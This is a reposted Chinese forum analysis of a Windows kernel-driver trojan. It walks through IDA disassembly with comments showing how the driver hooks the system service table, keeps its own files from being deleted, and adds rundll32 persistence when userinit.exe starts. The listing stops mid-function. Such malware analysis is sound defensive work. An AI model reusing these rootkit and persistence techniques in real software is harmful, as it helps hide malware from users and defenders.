[转帖]一个驱动木马的分析

一个驱动木马的分析
发表于: 2006-12-28 18:28
--------------------------------------------------------------------------------
【文章标题】: 一个驱动木马的分析
【文章作者】: prince
【作者邮箱】: cracker_prince@163.com
【作者QQ号】: 812937
【软件名称】: Trojan program Trojan-Downloader.Win32.Agent.bbb(卡巴命名)
【下载地址】: http://www.unpack.cn/viewthread.php?tid=8733&extra=page%3D1
【加壳方式】: 无
【编写语言】: ---
【使用工具】: IDA 5.0, WinDbg 6.6.007.5, VMWare 5.5.
【操作平台】: WINDOWS XP
【软件介绍】: 某木马or恶意软件的driver部分
【作者声明】: 水平有限，了解不多，仅作参考。
--------------------------------------------------------------------------------
【前言】
大概2个多星期前看到在Unpack『病毒木马』区Lvg同学发了这个样本，就用业余时间
看了看。本人纯属入门级选手，所以各位看到有什么解释的不妥或者直接让您喷饭地方，还请不吝赐教，
谢谢。

【详细过程】
由于是驱动文件，不考虑极端情况，就认为它没壳，直接IDA之。

入口：
.text:00010F5B ; *************** S U B R O U T I N E ***************************************
.text:00010F5B
.text:00010F5B
.text:00010F5B ; int __stdcall start(PDRIVER_OBJECT DriverObject,int)
.text:00010F5B                public start
.text:00010F5B start          proc near
.text:00010F5B
.text:00010F5B DriverObject = dword ptr  4
.text:00010F5B arg_4          = dword ptr  8
.text:00010F5B
.text:00010F5B                push [esp+arg_4]    ; RegistryPath
.text:00010F5F                call sub_10966    ; 参数为：RegistryPath；
.text:00010F5F                                        ; 修改SDT，hook关键函数
.text:00010F5F
.text:00010F64                test al, al       ; 判断hook是否成功
.text:00010F66                jnz    short loc_10F6F ; 成功则跳
.text:00010F66
.text:00010F68                mov    eax, 0C0000001h ; 否则返回STATUS_UNSUCCESSFUL
（0C0000001h）
.text:00010F6D                jmp    short locret_10FD2
.text:00010F6D
.text:00010F6F ; ---------------------------------------------------------------------------
.text:00010F6F
.text:00010F6F loc_10F6F:                            ; CODE XREF: start+Bj
.text:00010F6F                push esi
.text:00010F70                push edi
.text:00010F71                xor    edi, edi       ; edi清零
.text:00010F73                xor    esi, esi       ; esi清零
.text:00010F75                inc    esi
.text:00010F76                mov    dword_1160C, esi ; dword_1160C = 1
.text:00010F7C                mov    dword_11608, edi ; dword_11608 = 0
.text:00010F82                mov    dword_115FC, esi ; dword_115FC = 1
.text:00010F88                mov    dword_115F8, edi ; dword_115F8 = 0
.text:00010F8E                mov    dword_11604, edi ; dword_11604 = 0
.text:00010F94                mov    dword_11600, edi ; dword_11600 = 0
.text:00010F9A                mov    dword_11614, edi ; dword_11614 = 0
.text:00010FA0                mov    Handle, edi    ; Handle = 0
.text:00010FA6                call sub_10EFF    ; 创建线程 - 设置注册表注册驱动和打开
dll和sys文件
.text:00010FA6
.text:00010FAB                call sub_10C61    ;  ZwCreateFile打开"\SystemRoot"，判
断hook是否成功?
.text:00010FAB
.text:00010FB0                test al, al       ; 利用返回值判断是否打开成功
.text:00010FB2                jz    short loc_10FBC ; 打开失败则跳
.text:00010FB2
.text:00010FB4                push esi
.text:00010FB5                call sub_106B9    ; 用原始的NtCreateFile打开
.text:00010FB5                                        ; "\SystemRoot\system32
\drivers\esqyo.sys" 和
.text:00010FB5                                        ; "\SystemRoot\system32\ydljs.dll"并
保存句柄
.text:00010FB5                                        ; 目的是防止这两个文件被关闭和删除
.text:00010FB5
.text:00010FBA                jmp    short loc_10FC5
.text:00010FBA
.text:00010FBC ; ---------------------------------------------------------------------------
.text:00010FBC
.text:00010FBC loc_10FBC:                            ; CODE XREF: start+57j
.text:00010FBC                push [esp+8+DriverObject] ; DriverObject
.text:00010FC0                call sub_10D1B    ; 如果出现什么问题则调用
IoRegisterDriverReinitialization
.text:00010FC0                                        ; 重新再来一遍。狠...
.text:00010FC0
.text:00010FC5
.text:00010FC5 loc_10FC5:                            ; CODE XREF: start+5Fj
.text:00010FC5                push edi          ; Remove - edi = 0 （FALSE - 创建
hookRoutine）
.text:00010FC6                push offset NotifyRoutine ; NotifyRoutine - （监视函数）
.text:00010FC6                                        ; 该函数监视explorer.exe进程启动，跟
目标同时启动打开驱动、dll，写注册表等动作
.text:00010FCB                call PsSetCreateProcessNotifyRoutine ; 监视进程创建及销毁
.text:00010FCB
.text:00010FD0                pop    edi
.text:00010FD1                pop    esi
.text:00010FD1
.text:00010FD2
.text:00010FD2 locret_10FD2:                         ; CODE XREF: start+12j
.text:00010FD2                retn 8
.text:00010FD2
.text:00010FD2 start          endp

************************************************************************
跟进sub_10966:
.text:00010966 ; arg_0
.text:00010966
.text:00010966 sub_10966    proc near             ; CODE XREF: start+4p
.text:00010966
.text:00010966 arg_0 = dword ptr  8
.text:00010966
.text:00010966                push ebx          ; arg_0
.text:00010967                call sub_10857    ; 对一些常量字符串进行解码还原
.text:00010967
.text:0001096C                xor    ebx, ebx
.text:0001096E                push ebx          ; CSDVersion - NULL
.text:0001096F                push offset BuildNumber ; BuildNumber
.text:00010974                push offset MinorVersion ; MinorVersion
.text:00010979                push offset MajorVersion ; MajorVersion
.text:0001097E                call PsGetVersion ; 获取系统版本号，build number
.text:0001097E
.text:00010983                call sub_107F0    ; 在当前进程的EPROCESS结构中搜索字符
串"System",
.text:00010983                                        ; 返回的偏移值后面要用到
.text:00010983
.text:00010988                cmp    eax, ebx       ; 检查是否搜索到了指定字符串
.text:0001098A                mov    dword_118F0, eax ; 保存字符串在EPROCESS结构中的偏移,
.text:0001098A                                        ; 即dword_118F0 =
EPROCESS.ImageFileName
.text:0001098F                jnz    short loc_10998 ; 找到则跳走
.text:0001098F
.text:00010991                xor    al, al       ; 如果没找到指定字符串，则al 清零
.text:00010993                jmp    loc_10A2C    ; 跳到函数结尾返回
.text:00010993
.text:00010998 ; ---------------------------------------------------------------------------
.text:00010998
.text:00010998 loc_10998:                            ; CODE XREF: sub_10966+29j
.text:00010998                push ebp
.text:00010999                push esi
.text:0001099A                push edi
.text:0001099B                push 40h          ; size_t
.text:0001099D                push ebx          ; int
.text:0001099E                mov    esi, offset word_11618
.text:000109A3                push esi          ; void *
.text:000109A4                call memset       ; 变量word_11618清零（大小为0x40）
.text:000109A4
.text:000109A9                mov    edi, ds:wcsncpy
.text:000109AF                push 1Fh          ; size_t
.text:000109B1                push offset s_Esqyo  ; "esqyo"
.text:000109B6                push esi          ; wchar_t *
.text:000109B7                call edi ; wcsncpy ; 拷贝字符串"esqyo"至变量word_11618
.text:000109B9                push 40h          ; size_t
.text:000109BB                push ebx          ; int
.text:000109BC                mov    esi, offset unk_116A0
.text:000109C1                push esi          ; void *
.text:000109C2                call memset       ; 将变量unk_116a0清零（大小为0x40）
.text:000109C2
.text:000109C7                push 1Fh          ; size_t
.text:000109C9                push offset s_Ydljs  ; "ydljs"
.text:000109CE                push esi          ; wchar_t *
.text:000109CF                call edi ; wcsncpy ; 拷贝字符串"ydljs"至变量unk_116a0
.text:000109D1                mov    ebp, 200h
.text:000109D6                push ebp          ; size_t
.text:000109D7                push ebx          ; int
.text:000109D8                mov    esi, offset unk_116F0
.text:000109DD                push esi          ; void *
.text:000109DE                call memset       ; 将变量unk_116f0清零（大小0x200）
.text:000109DE
.text:000109E3                push 40h          ; size_t
.text:000109E5                push ebx          ; int
.text:000109E6                mov    ebx, offset word_11658
.text:000109EB                push ebx          ; void *
.text:000109EC                call memset       ; 将变量word_11658清零（大小0x40）
.text:000109EC
.text:000109F1                add    esp, 48h
.text:000109F4                push 1Fh          ; size_t
.text:000109F6                push offset s_Ydljs_0 ; "ydljs"
.text:000109FB                push ebx          ; wchar_t *
.text:000109FC                call edi ; wcsncpy ; 拷贝字符串"ydljs"至变量word_11658
.text:000109FE                push ebp          ; size_t
.text:000109FF                push 0             ; int
.text:00010A01                push esi          ; void *
.text:00010A02                call memset       ; 将变量unk_116f0清零（大小0x200）
.text:00010A02
.text:00010A07                mov    eax, [esp+24h+arg_0] ; +0x024 HardwareDatabase
: Ptr32 _UNICODE_STRING
.text:00010A07                                        ; Pointer to the
\Registry\Machine\Hardware path to the hardware configuration information in the registry.
.text:00010A0B                movzx ecx, word ptr [eax]
.text:00010A0E                push ecx          ; size_t
.text:00010A0F                push dword ptr [eax+4] ; void *
.text:00010A0F                                        ;
"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\esqyo"
.text:00010A12                push esi          ; void *
.text:00010A13                call memcpy       ; 将HardwareDatabase字符串拷贝至变量
unk_116f0
.text:00010A13
.text:00010A18                push esi          ; wchar_t *
.text:00010A19                call ds:_wcslwr    ; 转换为小写字母
.text:00010A19                                        ;
"registry\machine\system\controlset001\services\esqyo"
.text:00010A1F                add    esp, 28h
.text:00010A22                call sub_10883    ; 修改SDT来HOOK ZwCreateFile、
ZwSetValueKey、
.text:00010A22                                        ; ZwEnumerateKey、ZwOpenKey、ZwClose
等函数入口
.text:00010A22
.text:00010A27                pop    edi
.text:00010A28                pop    esi
.text:00010A29                mov    al, 1          ; 返回1表示成功
.text:00010A2B                pop    ebp
.text:00010A2B
.text:00010A2C
.text:00010A2C loc_10A2C:                            ; CODE XREF: sub_10966+2Dj
.text:00010A2C                pop    ebx
.text:00010A2D                retn 4
.text:00010A2D
.text:00010A2D sub_10966    endp
*************************************************************************************
sub_10857是对一些常量字符串的解码函数，所谓解码，其实就是将字符的ASCII码+1，呵呵。
sub_107F0搜索EPROCESS结构中的ImageFileName来计算偏移位置，后面判断进程创建的时候要用到这个值。
.text:000107F0 sub_107F0    proc near             ; CODE XREF: sub_10966+1Dp
.text:000107F0                push ebx
.text:000107F1                push esi
.text:000107F2                push edi
.text:000107F3                call ds:IoGetCurrentProcess ; 获取当前进程的PEPROCESS结构
指针
.text:000107F9                mov    ebx, eax       ; 保存指针至ebx
.text:000107FB                xor    edi, edi       ; edi清零
.text:000107FD                mov    esi, offset s_Rxrsdl ; esi指向字符串"System"
.text:000107FD
.text:00010802
.text:00010802 loc_10802:                            ; CODE XREF: sub_107F0+32j
.text:00010802                push esi          ; char *
.text:00010803                call strlen       ; 取"System"字符串长度
.text:00010803
.text:00010808                push eax          ; size_t 比较字符串的长度
.text:00010809                lea    eax, [edi+ebx]
.text:0001080C                push eax          ; char *
.text:0001080D                push esi          ; char *
.text:0001080E                call ds:strncmp    ; 比较字符串是否相等
.text:00010814                add    esp, 10h
.text:00010817                test eax, eax
.text:00010819                jz    short loc_1082A ; 相等就跳
.text:00010819
.text:0001081B                inc    edi
.text:0001081C                cmp    edi, 3000h    ; 遍历EPROCESS结构，搜索指定字符串
.text:00010822                jl    short loc_10802
.text:00010822
.text:00010824                xor    eax, eax       ; 没有找到指定字符串，返回0
.text:00010824
.text:00010826
.text:00010826 loc_10826:                            ; CODE XREF: sub_107F0+3Cj
.text:00010826                pop    edi
.text:00010827                pop    esi
.text:00010828                pop    ebx
.text:00010829                retn
.text:00010829
.text:0001082A ; ---------------------------------------------------------------------------
.text:0001082A
.text:0001082A loc_1082A:                            ; CODE XREF: sub_107F0+29j
.text:0001082A                mov    eax, edi       ; 返回指定字符串在EPROCESS中的偏移位
置
.text:0001082C                jmp    short loc_10826
.text:0001082C
.text:0001082C sub_107F0    endp
sub_10883利用修改SDT来hook一些函数：
.text:00010883
.text:00010883 sub_10883    proc near             ; CODE XREF: sub_10966+BCp
.text:00010883                mov    eax, ds:ZwCreateFile
.text:00010888                push ebx
.text:00010889                mov    ebx, ds:ZwSetValueKey
.text:0001088F                push ebp
.text:00010890                mov    ebp, ds:ZwEnumerateKey
.text:00010896                push esi
.text:00010897                mov    esi, ds:ZwOpenKey
.text:0001089D                push edi
.text:0001089E                mov    edi, ds:ZwClose
.text:000108A4                mov    dword_11698, esi ; ZwOpenKey
.text:000108AA                mov    dword_116E8, edi ; ZwClose
.text:000108B0                mov    dword_116E4, ebx ; ZwSetValueKey
.text:000108B6                mov    dword_116E0, ebp ; ZwEnumerateKey
.text:000108BC                mov    dword_116EC, eax ; ZwCreateFile
.text:000108C1                call sub_110EB    ; 得到ntoskrnl.exe，并映射到内存
.text:000108C1
.text:000108C6                test al, al       ; 检查返回值
.text:000108C8                jz    loc_1095F    ; 失败则跳走
.text:000108C8
.text:000108CE                push esi          ; ZwOpenKey
.text:000108CF                call sub_111E8    ; 修改SDT，返回一个地址（原始
NtOpenKey函数地址）
.text:000108CF
.text:000108D4                push ebx          ; ZwSetValueKey
.text:000108D5                mov    dword_11698, eax ; dword_11698 = 原始NtOpenKey函数地
址
.text:000108DA                call sub_111E8
.text:000108DA
.text:000108DF                push ebp          ; ZwEnumerateKey
.text:000108E0                mov    dword_116E4, eax ; dword_116E4 = 原始NtSetValueKey函
数地址
.text:000108E5                call sub_111E8
.text:000108E5
.text:000108EA                push edi          ; ZwClose
.text:000108EB                mov    dword_116E0, eax ; dword_116E0 = 原始NtEnumerateKey函
数地址
.text:000108F0                call sub_111E8
.text:000108F0
.text:000108F5                push ds:ZwCreateFile
.text:000108FB                mov    dword_116E8, eax ; dword_116E8 = 原始NtClose函数地址
.text:00010900                call sub_111E8
.text:00010900
.text:00010905                mov    dword_116EC, eax ; dword_116EC = 原始NtCreateFile函数
地址
.text:0001090A                call sub_11222    ; 取消映射，关闭section、file等句柄
.text:0001090A
.text:0001090F                xor    eax, eax
.text:00010911                cmp    dword_11698, eax ; 判断dword_11698(NtOpenKey())是否为
空
.text:00010917                jz    short loc_1093D ; 为零则跳
.text:00010917
.text:00010919                cmp    dword_116E4, eax ; 判断dword_116E4(NtSetValueKey())是
否为空
.text:0001091F                jz    short loc_1093D
.text:0001091F
.text:00010921                cmp    dword_116E0, eax ; 判断dword_116E0(NtEnumerateKey())
是否为空
.text:00010927                jz    short loc_1093D
.text:00010927
.text:00010929                cmp    dword_116E8, eax ; 判断dword_116E8(NtClose)是否为空
.text:0001092F                jz    short loc_1093D
.text:0001092F
.text:00010931                cmp    dword_116EC, eax ; 判断dword_116EC(NtCreateFile)是否
为空
.text:00010937                jz    short loc_1093D
.text:00010937
.text:00010939                mov    al, 1
.text:0001093B                jmp    short loc_10961 ; 否则返回1
.text:0001093B
.text:0001093D ; ---------------------------------------------------------------------------
.text:0001093D
.text:0001093D loc_1093D:                            ; CODE XREF: sub_10883+94j
.text:0001093D                                        ; sub_10883+9Cj
.text:0001093D                                        ; sub_10883+A4j
.text:0001093D                                        ; sub_10883+ACj
.text:0001093D                                        ; sub_10883+B4j
.text:0001093D                mov    eax, ds:ZwCreateFile
.text:00010942                mov    dword_11698, esi ; esi = ZwOpenKey
.text:00010948                mov    dword_116E8, edi ; edi = ZwClose
.text:0001094E                mov    dword_116E4, ebx ; ebx = ZwSetValueKey
.text:00010954                mov    dword_116E0, ebp ; ebp = ZwEnumerateKey
.text:0001095A                mov    dword_116EC, eax ; eax = ZwCreateFile
.text:0001095A
.text:0001095F
.text:0001095F loc_1095F:                            ; CODE XREF: sub_10883+45j
.text:0001095F                xor    al, al       ; 返回0
.text:0001095F
.text:00010961
.text:00010961 loc_10961:                            ; CODE XREF: sub_10883+B8j
.text:00010961                pop    edi
.text:00010962                pop    esi
.text:00010963                pop    ebp
.text:00010964                pop    ebx
.text:00010965                retn
.text:00010965
.text:00010965 sub_10883    endp
sub_110EB函数用来定位ntoskrnl.exe在内存中的位置；
sub_111E8函数开始修改SDT，hook自己关心的函数，并返回原始函数地址，留到后面给自己用：
.text:000111E8 sub_111E8    proc near             ; CODE XREF: sub_10883+4Cp
.text:000111E8                                        ; sub_10883+57p
.text:000111E8                                        ; sub_10883+62p
.text:000111E8                                        ; sub_10883+6Dp
.text:000111E8                                        ; sub_10883+7Dp
.text:000111E8
.text:000111E8 arg_0          = dword ptr  4
.text:000111E8
.text:000111E8                mov    eax, BaseAddress
.text:000111ED                test eax, eax
.text:000111EF                jz    short locret_1121F ; 基址为空则返回
.text:000111EF
.text:000111F1                mov    ecx, [esp+arg_0] ; ecx = 压栈的函数地址
.text:000111F5                mov    ecx, [ecx+1] ; 取该函数的在SDT中的索引号(magic
number)
.text:000111F5                                        ; 根据反汇编Zw**可以得知，函数入口处
+1的值即是magic number
.text:000111F8                test ch, 30h
.text:000111FB                push esi
.text:000111FC                jnz    short loc_1121C
.text:000111FC
.text:000111FE                push ecx          ; ecx = 入栈函数在SDT中的索引号
.text:000111FF                push eax          ; eax = BaseAddress
.text:00011200                push dword_11904    ; dword_11904为ntoskrnl.exe的基址
.text:00011206                call sub_10C07    ; 修改SDT，替换函数入口，返回原始函数
地址。
.text:00011206
.text:0001120B                mov    esi, eax       ; 保存返回的地址
.text:0001120D                push esi          ; VirtualAddress
.text:0001120E                call ds:MmIsAddressValid ; 检查该地址的有效性
.text:00011214                test al, al
.text:00011216                jz    short loc_1121C ; 如果地址不可用则跳走
.text:00011216
.text:00011218                mov    eax, esi       ; 否则保留该地址为此函数的返回值
.text:0001121A                jmp    short loc_1121E
.text:0001121A
.text:0001121C ; ---------------------------------------------------------------------------
.text:0001121C
.text:0001121C loc_1121C:                            ; CODE XREF: sub_111E8+14j
.text:0001121C                                        ; sub_111E8+2Ej
.text:0001121C                xor    eax, eax       ; 返回值置零，表示失败
.text:0001121C
.text:0001121E
.text:0001121E loc_1121E:                            ; CODE XREF: sub_111E8+32j
.text:0001121E                pop    esi
.text:0001121E
.text:0001121F
.text:0001121F locret_1121F:                         ; CODE XREF: sub_111E8+7j
.text:0001121F                retn 4
.text:0001121F
.text:0001121F sub_111E8    endp
hook SDT的代码，网上多得很，我这里没有仔细分析。简单用Windbg跟了一下，察看sub_10C07函数返回
的地址，在Windbg中用 uf 命令来反汇编压栈的函数，看看地址是否吻合；或者用 ln 命令直接察看该地
址也可以。所以可以猜测hook函数原型是：NTPROC* HookFuncBySdt(NTPROC *Zw***);
**********************************************************************
一路返回到我们开始的地方，继续看下面的代码：
sub_10EFF创建了一个线程，用来写注册表注册驱动，跟进之后来到：
...
.text:00010F35                add    esp, 18h
.text:00010F38                push offset sub_104D0 ; StartContext （回调函数的参数）
.text:00010F3D                push edi          ; StartRoutine
.text:00010F3E                push esi          ; ClientId
.text:00010F3F                push esi          ; ProcessHandle
.text:00010F40                push esi          ; ObjectAttributes
.text:00010F41                push esi          ; DesiredAccess
.text:00010F42                lea    eax, [ebp+Handle]
.text:00010F45                push eax          ; ThreadHandle
.text:00010F46                call ds:PsCreateSystemThread ; 创建线程 sub_10EEF
...
线程回调函数的参数sub_104D0也是一个函数地址，用来写注册表来注册这个驱动；
StartRoutine主要是打开2个文件，保存他们的句柄，使得用户不能关闭或删除他们：
.text:00010DC5 ; void __stdcall StartRoutine(PVOID)
.text:00010DC5 StartRoutine proc near             ; DATA XREF: NotifyRoutine+D6o
.text:00010DC5
.text:00010DC5 Interval       = LARGE_INTEGER ptr -8
.text:00010DC5
.text:00010DC5                push ebp
.text:00010DC6                mov    ebp, esp
.text:00010DC8                push ecx
.text:00010DC9                push ecx
.text:00010DCA                or    dword ptr [ebp+Interval+4], 0FFFFFFFFh
.text:00010DCE                lea    eax, [ebp+Interval]
.text:00010DD1                push eax          ; Interval
.text:00010DD2                push 0             ; Alertable
.text:00010DD4                push 0             ; WaitMode
.text:00010DD6                mov    dword ptr [ebp+Interval], 0FA0A1F00h
.text:00010DDD                call ds:KeDelayExecutionThread
.text:00010DE3                push 1
.text:00010DE5                call sub_106B9    ; 打开驱动和dll文件
.text:00010DE5
.text:00010DEA                push 1             ; ExitStatus
.text:00010DEC                call ds:PsTerminateSystemThread
.text:00010DF2                leave
.text:00010DF3                retn 4
.text:00010DF3
.text:00010DF3 StartRoutine endp
打开文件函数sub_106B9：
.text:000106B9 SourceString = word ptr -100h
.text:000106B9 arg_0          = dword ptr  8
.text:000106B9
.text:000106B9                push ebp
.text:000106BA                mov    ebp, esp
.text:000106BC                sub    esp, 100h
.text:000106C2                and    [ebp+SourceString], 0
.text:000106CA                push ebx
.text:000106CB                push esi
.text:000106CC                push edi
.text:000106CD                push 3Fh
.text:000106CF                pop    ecx
.text:000106D0                xor    eax, eax
.text:000106D2                lea    edi, [ebp-0FEh]
.text:000106D8                rep stosd
.text:000106DA                stosw
.text:000106DC                mov    edi, 100h
.text:000106E1                push edi          ; size_t
.text:000106E2                lea    eax, [ebp+SourceString]
.text:000106E8                push 0             ; int
.text:000106EA                push eax          ; void *
.text:000106EB                call memset       ; SourceString清零
.text:000106EB
.text:000106F0                mov    esi, ds:swprintf
.text:000106F6                push offset word_11618 ; word_11618 == 字符串"esqyo"
.text:000106FB                push offset asc_1139E ; 解码后asc_1139E ==
"\SystemRoot\system32\drivers\"
.text:00010700                lea    eax, [ebp+SourceString]
.text:00010706                push offset s_SS_sys ; "%s%s.sys"
.text:0001070B                push eax          ; wchar_t *
.text:0001070C                call esi ; swprintf  ; 格式化后的字符串
为："\SystemRoot\system32\drivers\esqyo.sys"
.text:0001070E                mov    ebx, ds:ZwClose
.text:00010714                add    esp, 1Ch
.text:00010717                cmp    [ebp+arg_0], 1  ; 检查压栈参数(打开文件是否成功)
.text:0001071B                jnz    short loc_10741 ; 打开文件失败则跳走
.text:0001071B
.text:0001071D                mov    eax, Handle    ; esqyo.sys文件句柄
.text:00010722                test eax, eax
.text:00010724                jz    short loc_10730 ; 句柄为空则跳
.text:00010724
.text:00010726                push eax          ; Handle
.text:00010727                call ebx ; ZwClose ; 否则,关闭之
.text:00010729                and    Handle, 0    ; Handle清零
.text:00010729
.text:00010730
.text:00010730 loc_10730:                            ; CODE XREF: sub_106B9+6Bj
.text:00010730                push offset dword_115F8 ; int - dword_115F8 = 0
.text:00010735                lea    eax, [ebp+SourceString]
.text:0001073B                push eax          ; SourceString =
"\SystemRoot\system32\drivers\esqyo.sys"
.text:0001073C                call sub_10440    ; CreateFile打开该文件
.text:0001073C
.text:00010741
.text:00010741 loc_10741:                            ; CODE XREF: sub_106B9+62j
.text:00010741                cmp    [ebp+arg_0], 0  ; 检查压栈参数(打开文件是否成功)
.text:00010745                jnz    short loc_1076B ; 打开成功则跳走
.text:00010745
.text:00010747                mov    eax, dword_115F8 ; dword_115F8 = 0
.text:0001074C                test eax, eax
.text:0001074E                jz    short loc_1075A ; 如果为0则跳走
.text:0001074E
.text:00010750                push eax          ; Handle
.text:00010751                call ebx ; ZwClose ; 不为0则将该句柄关闭
.text:00010753                and    dword_115F8, 0  ; 将其清零
.text:00010753
.text:0001075A
.text:0001075A loc_1075A:                            ; CODE XREF: sub_106B9+95j
.text:0001075A                push offset Handle ; int - Handle = 0
.text:0001075F                lea    eax, [ebp+SourceString] ; SourceString =
"\SystemRoot\system32\drivers\esqyo.sys"
.text:00010765                push eax          ; SourceString
.text:00010766                call sub_10440    ; 再次尝试NtCreateFile打开该文件
.text:00010766
.text:0001076B
.text:0001076B loc_1076B:                            ; CODE XREF: sub_106B9+8Cj
.text:0001076B                push edi          ; size_t
.text:0001076C                lea    eax, [ebp+SourceString]
.text:00010772                push 0             ; int
.text:00010774                push eax          ; void *
.text:00010775                call memset       ; SourceString清零
.text:00010775
.text:0001077A                push offset unk_116A0 ; unk_116A0 = "ydljs"
.text:0001077F                push offset asc_113DA ; asc_113DA解码后
为："\SystemRoot\system32\"
.text:00010784                lea    eax, [ebp+SourceString]
.text:0001078A                push offset s_SS_dll ; "%s%s.dll"
.text:0001078F                push eax          ; wchar_t *
.text:00010790                call esi ; swprintf  ; SourceString =
"\SystemRoot\system32\ydljs.dll"
.text:00010792                add    esp, 1Ch
.text:00010795                cmp    [ebp+arg_0], 1  ; 判断压栈参数
.text:00010799                jnz    short loc_107BF ; 如果arg_0 != 1则跳走不执行打开该文
件的动作
.text:00010799
.text:0001079B                mov    eax, dword_11600 ; dword_11600 == 0
.text:000107A0                test eax, eax
.text:000107A2                jz    short loc_107AE ; 如果dword_11600为0则跳去打开此文件
.text:000107A2
.text:000107A4                push eax          ; Handle
.text:000107A5                call ebx ; ZwClose ; 否则将该句柄关闭
.text:000107A7                and    dword_11600, 0  ; dword_11600清零
.text:000107A7
.text:000107AE
.text:000107AE loc_107AE:                            ; CODE XREF: sub_106B9+E9j
.text:000107AE                push offset dword_11608 ; int - dword_11608 == 0
.text:000107B3                lea    eax, [ebp+SourceString]
.text:000107B9                push eax          ; SourceString - SourceString =
"\SystemRoot\system32\ydljs.dll"
.text:000107BA                call sub_10440    ; 调用原始的NtCreateFile打开该文件
.text:000107BA
.text:000107BF
.text:000107BF loc_107BF:                            ; CODE XREF: sub_106B9+E0j
.text:000107BF                cmp    [ebp+arg_0], 0  ; 判断压栈参数是否为0
.text:000107C3                jnz    short loc_107E9 ; 不为0则跳走直接返回
.text:000107C3
.text:000107C5                mov    eax, dword_11608
.text:000107CA                test eax, eax       ; 判断dword_11608是否为0
.text:000107CC                jz    short loc_107D8 ; 如果dword_11608为0则跳去打开该dll
.text:000107CC
.text:000107CE                push eax          ; Handle
.text:000107CF                call ebx ; ZwClose ; 否则将其关闭
.text:000107D1                and    dword_11608, 0  ; dword_11608 = 0
.text:000107D1
.text:000107D8
.text:000107D8 loc_107D8:                            ; CODE XREF: sub_106B9+113j
.text:000107D8                push offset dword_11600 ; int - dword_11600 = 0
.text:000107DD                lea    eax, [ebp+SourceString]
.text:000107E3                push eax          ; SourceString - SourceString =
"\SystemRoot\system32\ydljs.dll"
.text:000107E4                call sub_10440    ; 用原始的NtCreateFile函数打开该dll
.text:000107E4
.text:000107E9
.text:000107E9 loc_107E9:                            ; CODE XREF: sub_106B9+10Aj
.text:000107E9                pop    edi
.text:000107EA                pop    esi
.text:000107EB                pop    ebx
.text:000107EC                leave
.text:000107ED                retn 4
.text:000107ED
.text:000107ED sub_106B9    endp
回到DriverEntry，sub_10C61这个函数用hook之后的ZwCreateFile来打开"\SystemRoot"，可能是用来判
断前面的hook工作是否成功？接下来判断返回值，如果认为失败，跳到loc_10FBC调用
IoRegisterDriverReinitialization函数重新初始化驱动，直到一切都OK...
最后PsSetCreateProcessNotifyRoutine监视进程创建，我们来看看它做了什么：
.text:00010DF6 ; void __stdcall NotifyRoutine(HANDLE,HANDLE,BOOLEAN)
.text:00010DF6 NotifyRoutine proc near             ; DATA XREF: start+6Bo
.text:00010DF6
.text:00010DF6 SourceString = word ptr -210h
.text:00010DF6 var_10       = byte ptr -10h
.text:00010DF6 Handle       = dword ptr  0Ch
.text:00010DF6 arg_8          = byte ptr  10h
.text:00010DF6
.text:00010DF6                push ebp
.text:00010DF7                mov    ebp, esp
.text:00010DF9                sub    esp, 210h
.text:00010DFF                push ebx
.text:00010E00                xor    ebx, ebx       ; ebx = 0
.text:00010E02                cmp    [ebp+arg_8], bl ; 判断是否是进程销毁事件
.text:00010E05                jz    loc_10EEA    ; 是的话跳走返回（不关心进程销毁）
.text:00010E05
.text:00010E0B                cmp    [ebp+Handle], 14h
.text:00010E0F                jb    loc_10EEA    ; 如果Handle < 0x14的话也直接返回
.text:00010E0F
.text:00010E15                lea    eax, [ebp+arg_8]
.text:00010E18                push eax          ; 进程ID
.text:00010E19                push [ebp+Handle] ; EPROCESS buffer
.text:00010E1C                mov    dword ptr [ebp+arg_8], ebx
.text:00010E1F                call ds:PsLookupProcessByProcessId
.text:00010E25                test eax, eax       ; 判断结果是否成功
.text:00010E27                jl    loc_10EEA
.text:00010E27
.text:00010E2D                mov    ecx, dword ptr [ebp+arg_8] ; ecx = EPROCESS
.text:00010E30                xor    eax, eax       ; eax = 0
.text:00010E32                push esi
.text:00010E33                push edi
.text:00010E34                mov    [ebp+var_10], bl
.text:00010E37                lea    edi, [ebp-0Fh]
.text:00010E3A                stosd
.text:00010E3B                stosd
.text:00010E3C                stosd
.text:00010E3D                stosw
.text:00010E3F                stosb
.text:00010E40                mov    eax, dword_118F0 ; dword_118F0 是字符串"System"在
EPROCESS结构中的偏移
.text:00010E40                                        ; 也就是EPROCESS.ImageFileName
.text:00010E45                add    eax, ecx       ; 定位偏移地址
.text:00010E47                push 0Fh          ; size_t
.text:00010E49                push eax          ; char *
.text:00010E4A                lea    eax, [ebp+var_10]
.text:00010E4D                push eax          ; char *
.text:00010E4E                call ds:strncpy
.text:00010E54                mov    esi, ds:_stricmp
.text:00010E5A                lea    eax, [ebp+var_10]
.text:00010E5D                push offset s_Trdqhmhs-dwd ; s_Trdqhmhs-dwd解码后
为："userinit.exe"
.text:00010E62                push eax          ; char *
.text:00010E63                call esi ; _stricmp  ; 比较字符串
.text:00010E65                add    esp, 14h
.text:00010E68                test eax, eax       ; 判断结果
.text:00010E6A                jnz    short loc_10EBA ; 不是指定进程则跳
.text:00010E6A
.text:00010E6C                push 7Fh
.text:00010E6E                pop    ecx
.text:00010E6F                mov    [ebp+SourceString], bx
.text:00010E76                lea    edi, [ebp-20Eh]
.text:00010E7C                rep stosd
.text:00010E7E                push 200h          ; size_t
.text:00010E83                stosw
.text:00010E85                lea    eax, [ebp+SourceString]
.text:00010E8B                push ebx          ; int
.text:00010E8C                push eax          ; void *
.text:00010E8D                call memset       ; 否则对SourceString进行清零
.text:00010E8D
.text:00010E92                push offset unk_116A0 ; unk_116A0 = "ydljs"
.text:00010E97                lea    eax, [ebp+SourceString]
.text:00010E9D                push offset s_SystemrootSys ; "%%systemroot%%\\system32
\\Rundll32.exe %%"...
.text:00010EA2                push eax          ; wchar_t *
.text:00010EA3                call ds:swprintf    ; SourceString =
.text:00010EA3                                        ; "%systemroot%\system32\Rundll32.exe
%systemroot%\system32\ydljs.dll,DllUnregisterServer"
.text:00010EA9                add    esp, 18h
.text:00010EAC                lea    eax, [ebp+SourceString]
.text:00010EB2                push eax          ; SourceString
.text:00010EB3                call sub_10D2F    ; 写注册表，用rundll32.exe在启动的时
候加载ydljs.dll
.text:00010EB3
.text:00010EB8                jmp    short loc_10EE8
.text:00010EB8
.text:00010EBA ; ---------------------------------------------------------------------------
.text:00010EBA
.text:00010EBA loc_10EBA:                            ; CODE XREF: NotifyRoutine+74j
